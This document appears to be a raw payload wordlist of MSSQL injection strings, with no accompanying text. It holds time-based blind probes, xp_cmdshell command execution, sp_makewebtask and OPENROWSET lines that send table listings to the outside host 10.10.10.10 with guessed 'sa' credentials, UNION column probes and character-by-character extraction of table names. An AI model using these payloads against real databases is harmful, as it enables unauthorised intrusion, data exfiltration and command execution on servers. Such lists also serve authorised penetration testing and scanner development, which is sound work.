WAITFOR DELAY '0:0:10'
1; WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '0:0:10'--
" WAITFOR DELAY '0:0:10'--
1) WAITFOR DELAY '0:0:10'--
1 AND 1=(SELECT TOP 1 1 FROM (SELECT(SLEEP(10)))a)
'; EXEC master..xp_cmdshell 'ping -n 10 127.0.0.1'--
1; EXEC sp_makewebtask '\10.10.10.10\share\output.html', 'SELECT * FROM INFORMATION_SCHEMA.TABLES'--
1 AND 1=CONVERT(int, (CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)+CHAR(58)))
IF 1=1 WAITFOR DELAY '0:0:10'
; WAITFOR DELAY '0:0:10'--
); WAITFOR DELAY '0:0:10'--
)); WAITFOR DELAY '0:0:10'--
1 OR WAITFOR DELAY '0:0:10'
1 AND 1=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)
1; SELECT * FROM OPENROWSET('SQLOLEDB', '10.10.10.10';'sa';'password', 'SELECT * FROM INFORMATION_SCHEMA.TABLES')--
1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
1; DECLARE @cmd VARCHAR(4000); SET @cmd='ping -n 10 127.0.0.1'; EXEC master..xp_cmdshell @cmd;--
1 AND 1=(SELECT TOP 1 SUBSTRING(name, 1, 1) FROM sysobjects WHERE id=object_id('sysobjects'))
1 AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1)) > 70
